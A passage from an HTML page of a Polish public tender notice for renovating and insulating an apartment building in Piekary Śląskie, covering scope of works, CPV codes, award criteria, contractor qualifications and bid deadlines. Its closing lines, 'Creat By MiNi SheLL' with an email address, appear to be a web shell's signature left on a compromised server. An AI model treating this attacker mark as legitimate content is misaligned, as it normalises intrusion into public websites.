class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III pod nazwą: ,,Remont i docieplenie budynku mieszkalnego wielorodzinnego przy ul. Wyszyńskiego 8a w Piekarach<br/>Śląskich.”<br/>2.3.1. Zakres robót obejmować będzie m.in.:<br/>- docieplenie ścian zewnętrznych ponad poziomem terenu w systemie ETICS Przedmiotem zamówienia jest: docieplenie<br/>ścian zewnętrznych ponad poziomem terenu w systemie ETICS (BSO) z zastosowaniem wełny mineralnej, ocieplenie ścian<br/>zewnętrznych piwnic, wykonanie izolacji przeciwwilgociowej ścian piwnic, remont stropu piwnicy, ocieplenie stropu nad<br/>piwnicą, docieplenie stropu nad ostatnią kondygnacją, dobudowa kominów wentylacyjnych, wymiana wywiewek<br/>kanalizacyjnych, wymiana starych okien mieszkań i części wspólnych, wymiana drzwi zewnętrznych, montaż daszku nad<br/>wejściem, montaż instalacji domofonowej, remont klatki schodowej wraz z wymianą instalacji elektrycznej, białkowanie ścian<br/>piwnic, remont schodów wejściowych, wymiana parapetów i obróbek blacharskich, przełożenie rur spustowych, wymiana<br/>wyłazu na poddasze, dostawa systemowej drabiny lub schodów drabiniastych do nowego wyłazu, dostawa i montaż<br/>systemowych masztów antenowych wraz z okablowaniem, wykonanie chodnika oraz opaski wokół budynku, wykonanie<br/>nowej instalacji zewnętrznego monitoringu CCTV, wykonanie nowego oświetlenia przed wejściem do klatki schodowej z nr<br/>policyjnym wymiana źródeł ciepła w mieszkaniach w których w stanie istniejącym jest ogrzewanie węglowe - montaż<br/>ogrzewania elektrycznego (piece akumulacyjne);<br/>2.3.2. W celach informacyjnych oraz dla potrzeb określenia zgodności z wymaganiami związanymi z uzyskaniem premii<br/>MZG z grantem MZG w ramach PROGRAMU TERMO, Zamawiający wymaga opracowania przez Wykonawcę na dzień<br/>zawarcia umowy o zamówienie publiczne harmonogramu rzeczowo - finansowego określającego terminy wykonania<br/>poszczególnych etapów prac z uwzględnieniem wymaganych przez Zamawiającego poniżej dokumentów: 1) Wykonawca zobowiązany jest do sporządzenia audytu przedrozbiórkowego, mającego na celu analizę jakościową i<br/>ilościową strumieni odpadów oraz określającego możliwości ich zagospodarowania zgodnie z hierarchią postępowania z<br/>odpadami i Protokołem UE, dotyczącym gospodarowania odpadami z budowy i rozbiórki.<br/>2) Wykonawca zobowiązany jest do sporządzenia planu segregacji odpadów oraz wykazu odpadów, które powstaną w<br/>związku z przygotowaniem ternu robót, umożliwiający ustanowienie wewnętrznego systemu zarządzania odpada-mi<br/>(demontaż, sortowanie, zbieranie) zapewniającego ich selektywny odbiór z terenu robót zgodnie z hierarchią postępowania<br/>z odpadami i Protokołem UE, dotyczącym gospodarowania odpadami z budowy i rozbiórki.<br/>3) Wykonawca zobowiązany jest do sporządzenia wykazu działań skutecznie zapobiegających emisji hałasu, kurzu i<br/>zanieczyszczeń, występujących wskutek realizacji robót budowlanych. Działania powinny wpływać na efektywne obniżenie<br/>natężenia czynników negatywnych bądź prowadzić do ich całkowitego wyeliminowania, dzięki wykorzystaniu najlepszych<br/>technik.<br/>4) Wykonawca zobowiązany jest do przedkładania w trakcie prowadzenia robót Zamawiającemu deklaracji właściwości<br/>użytkowych lub krajowych deklaracji właściwości użytkowych lub innych dokumentów potwierdzających po-siadanie<br/>wymaganych właściwości przez wyroby budowlane. Deklaracje wydawane są w oparciu o przepisy ustawy z dnia 16<br/>kwietnia 2004 r. o wyro-bach budowlanych (Dz. U. z 2021 r. poz. 1213). W przypadku gdy deklaracje nie będą zawierały<br/>informacji o właściwościach wymaganych w ramach reguły DNSH Wykonawca zobowiązany jest przedłożyć inne<br/>dokumenty towarzyszące wyrobowi: karta charakterystyki, instrukcja, opis producenta itp.<br/>5) Wykonawca zobowiązany jest do przedłożenia Zamawiającemu dokumentów potwierdzających gospodarowanie<br/>odpadów z budowy i rozbiórki powstałych w trakcie prowadzenia robót zgodnie z obowiązującymi przepisami prawa<br/>uwzględniając najlepsze dostępne techniki.<br/>6) Wykonawca zobowiązany jest do przedłożenia Zamawiającemu oświadczenia kierownika robót budowlanych o realizacji<br/>przedsięwzięcia remontowego zgodnie z projektem budowlanym na druku wymaganym przez BGK na dzień rozpoczęcia<br/>czynności odbiorowych.<br/>Zamawiający zobowiązany jest do gromadzenia wyżej wymienionych dokumentów celem poświadczenia, że<br/>przedsięwzięcie nie wyrządza poważnych szkód dla celów środowiskowych i stanowi ono potwierdzenie zgodności<br/>inwestycji z wymaganiami reguły DNSH.<br/>2.3.3. Zamawiający nie wymaga dokumentacji wykazującej zgodności z procedurami związanymi z pracami przy wyrobach<br/>zawierających azbest oraz uprawnień związanych z usuwaniem azbestu. Budynek nie zawiera wyrobów zawierających<br/>azbest.<br/>2.3.4. Świadectwo charakterystyki energetycznej wskazujące jakie jest zapotrzebowanie budynku na energię po<br/>przeprowadzeniu inwestycji Zamawiający opracuje we własnym zakresie.<br/>3. Szczegółowy opis przedmiotu zamówienia zawiera:<br/> załącznik nr 4 do SWZ, tj.:<br/>Część I - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/>Część II - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/>Część III - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/> załącznik nr 5 do SWZ tj. Ocena przedsięwzięcia remontowego dla celów środowiskowych – Część I, II, III.<br/> załącznik nr 7 do SWZ tj. Analiza dotycząca wpisywania się w gospodarkę o obiegu zamkniętym – Część I, II, III. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.4.1. Wykonawca musi wykazać dla każdej części, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie zgodnie z przepisami prawa budowlanego<br/>i prawidłowo ukończył co najmniej dwie roboty budowlane polegają-ce na termomodernizacji (ociepleniu) budynku<br/>wielorodzinnego o wartości 500.000,00 zł brutto, każda z nich.<br/>Uwaga: W przypadku składania ofert na więcej niż jedną część Zamawiający dopuszcza, aby Wykonawca wykazał te<br/>same/tą samą robotę budowlaną na każdą część.<br/>3.4.2. Wykonawca musi wykazać dla każdej części dysponowanie osobą/ami zdolną/ymi do wykonania zamówienia tj.<br/>a) należy wykazać dysponowanie jedną osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjnobudowlanej<br/>lub architektonicznej do kierowania robotami budowlanymi – przewidzianą do pełnienia funkcji kierownika robót<br/>konstrukcyjno - budowlanych;<br/>b) należy wykazać dysponowanie jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń elektrycznych elektroenergetycznych do kierowania robotami budowlanymi instalacji<br/>elektrycznych;<br/>c) należy wykazać dysponowanie jedną osobę posiadającą uprawnienia budowlane<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych do kierowania robotami budowlanymi instalacji sanitarnych;<br/>lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów lub których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach<br/>określonych w przepisach odrębnych,<br/>oraz zrzeszoną/ymi we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o<br/>samorządach zawodowych architektów oraz inżynierów budownictwa (t. j. Dz. U. z 2023 r. poz. 551),<br/>lub spełniającą/ymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane (t. j. Dz. U. z 2024 r.<br/>poz. 725 z późn. zm.). tj. osobą/ami której/ych odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych<br/>w przepisach odrębnych lub spełniającą/ymi wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000r. o samorządach<br/>zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”).<br/>Uwaga: 1) Osoby, które Wykonawca wykaże na potwierdzenie spełnienia warunku udziału w postępowaniu muszą uczestniczyć w<br/>realizacji umowy.<br/>2) Wskazane wyżej osoby muszą posiadać uprawnienia odpowiadające wymaganiom określonym w ustawie Prawo<br/>budowlane z dnia 7 lipca 1994 r. (tekst jednolity: Dz. U. z 2024 r. poz. 725 ze zm.) lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz być zrzeszeni we właściwym<br/>samorządzie zawodowym, zgodnie z zapisami ustawy o samorządach zawodowych architektów oraz inżynierów<br/>budownictwa (tekst jednolity: Dz. U. 2023, poz. 551).<br/>3) Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą również wykonywać<br/>osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. 2023, poz. 334.)<br/>Uwaga:<br/>Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje<br/>wszystkich warunków wymaganych dla poszczególnych funkcji (tj. posiadania uprawnień).<br/>W przypadku składania ofert na więcej niż jedną część Wykonawca może wykazać dysponowanie tymi samymi osobami na<br/>każdą część.<br/>Zamawiający nie określa, szczególnego sposobu spełniania określonego wyżej warunku, przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (brak skorzystania z dyspozycji zawartej w art. 117 ust. 1 ustawy), co oznacza<br/>możliwość sumowania zasobów w tym zakresie.<br/>5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: Tak<br/>5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: 4.1. Wykonawca, którego<br/>oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art.<br/>274 ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich<br/>złożenia):<br/> oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w<br/>zakresie podstaw wykluczenia z postępowania wskazanych w art. 108 ust. 1,<br/> oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z 2024 r. poz. 1616), z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo<br/> oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej,<br/> zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt 4.1 składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu<br/>(określonych przez Zamawiającego w ust. 3 niniejszego rozdziału SWZ), na podstawie art. 274 ust. 1 usta-wy zostanie wezwany do<br/>złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/> w celu wykazania spełniania warunku z ust. 3.4.1.<br/>wykaz robot budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania, powierzchni<br/>docieplenia elewacji i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykona-ne zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone;<br/> w celu wykazania spełniania warunku z ust. 3.4.2.<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacje<br/>o podstawie do dysponowania tymi osobami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej<br/>umowy, zawiera załącznik nr 6 do SWZ.<br/>1.1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455<br/>ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 6 do SWZ.<br/>1.2. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy.<br/>2. Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale XXIX SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej https://zgmpiekary. logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com